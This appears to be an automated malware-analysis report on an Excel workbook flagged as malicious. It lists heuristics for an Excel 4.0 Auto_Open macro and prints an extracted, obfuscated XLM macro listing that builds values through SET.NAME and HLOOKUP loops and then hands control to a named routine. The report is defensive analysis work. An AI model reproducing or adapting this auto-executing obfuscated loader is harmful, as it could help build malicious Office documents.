MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6962 bytes |
SHA-256: 235dd088b9eae5f6ea6398cb9209fd262c38b34fa9b8b19a5941842fb4b30963 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - NbTTTahPEBq
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C191
' 0018 27 LABEL : Cell Value, String Constant - BXoTuGZJUCAI len=0
' 0018 25 LABEL : Cell Value, String Constant - dtsEBKncsE len=0
' 0018 21 LABEL : Cell Value, String Constant - EcGHEo len=0
' 0018 23 LABEL : Cell Value, String Constant - eIiBjSmL len=0
' 0018 25 LABEL : Cell Value, String Constant - eijWSGxTdT len=0
' 0018 24 LABEL : Cell Value, String Constant - EkzvXtHng len=0
' 0018 25 LABEL : Cell Value, String Constant - FWGqaubUXl len=0
' 0018 25 LABEL : Cell Value, String Constant - fZtYVxoaWf len=0
' 0018 25 LABEL : Cell Value, String Constant - GSMIZyENCM len=0
' 0018 24 LABEL : Cell Value, String Constant - HKFmzqorE len=0
' 0018 26 LABEL : Cell Value, String Constant - jGjQneESzJC len=0
' 0018 21 LABEL : Cell Value, String Constant - JPZuQU len=0
' 0018 25 LABEL : Cell Value, String Constant - jRyyTXxVaL len=0
' 0018 25 LABEL : Cell Value, String Constant - LQPNmOhvVP len=0
' 0018 25 LABEL : Cell Value, String Constant - MzpHxVUOOO len=0
' 0018 20 LABEL : Cell Value, String Constant - nFpeU len=0
' 0018 25 LABEL : Cell Value, String Constant - nJkxMVuXPS len=0
' 0018 21 LABEL : Cell Value, String Constant - OovOpj len=0
' 0018 22 LABEL : Cell Value, String Constant - qVeYxIw len=0
' 0018 25 LABEL : Cell Value, String Constant - VyfgXJdvVs len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' NbTTTahPEBq,R46,"",850.00000000000000000000
' NbTTTahPEBq,R47,"",131.00000000000000000000
' NbTTTahPEBq,R48,"",125.00000000000000000000
' NbTTTahPEBq,R49,"",924.00000000000000000000
' NbTTTahPEBq,R50,"",-678.00000000000000000000
' NbTTTahPEBq,R51,"",217.00000000000000000000
' NbTTTahPEBq,C102,"SET.NAME("LQPNmOhvVP",0+VALUE("0"))",""
' NbTTTahPEBq,C104,"SET.NAME("fZtYVxoaWf",LQPNmOhvVP)",""
' NbTTTahPEBq,C106,"SET.NAME("dtsEBKncsE",LQPNmOhvVP)",""
' NbTTTahPEBq,C108,"SET.NAME("GSMIZyENCM",COUNTA(OovOpj))",""
' NbTTTahPEBq,C110,"SET.NAME("jRyyTXxVaL",COUNTA(VyfgXJdvVs))",""
' NbTTTahPEBq,C114,[],""
' NbTTTahPEBq,C116,"SET.NAME("nJkxMVuXPS","")",""
' NbTTTahPEBq,C118,"fZtYVxoaWf",""
' NbTTTahPEBq,C123,"SET.NAME("nFpeU",HLOOKUP("*",OovOpj,fZtYVxoaWf,FALSE))",""
' NbTTTahPEBq,C128,"MzpHxVUOOO",""
' NbTTTahPEBq,C133,"SET.NAME("EcGHEo",LQPNmOhvVP)",""
' NbTTTahPEBq,C138,[],""
' NbTTTahPEBq,C142,"EcGHEo",""
' NbTTTahPEBq,C146,"JPZuQU",""
' NbTTTahPEBq,C150,"jGjQneESzJC",""
' NbTTTahPEBq,C154,"EkzvXtHng",""
' NbTTTahPEBq,C156,"SET.NAME("qVeYxIw",VALUE(HLOOKUP("*",VyfgXJdvVs,EkzvXtHng,FALSE)))",""
' NbTTTahPEBq,C158,"eijWSGxTdT",""
' NbTTTahPEBq,C163,"nJkxMVuXPS",""
' NbTTTahPEBq,C168,"dtsEBKncsE",""
' NbTTTahPEBq,C170,NEXT(),""
' NbTTTahPEBq,C175,"BXoTuGZJUCAI",""
' NbTTTahPEBq,C178,[],""
' NbTTTahPEBq,C183,"eIiBjSmL",""
' NbTTTahPEBq,C185,NEXT(),""
' NbTTTahPEBq,C189,RETURN(),""
' NbTTTahPEBq,C220,"SET.NAME("FWGqaubUXl",C102)",""
' NbTTTahPEBq,C225,"OovOpj",""
' NbTTTahPEBq,C229,"SET.NAME("VyfgXJdvVs",R68C12)",""
' NbTTTahPEBq,C234,"SET.NAME("eIiBjSmL",242)",""
' NbTTTahPEBq,C236,"SET.NAME("HKFmzqorE",3)",""
' NbTTTahPEBq,C241,FWGqaubUXl(),""
' NbTTTahPEBq,C242,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.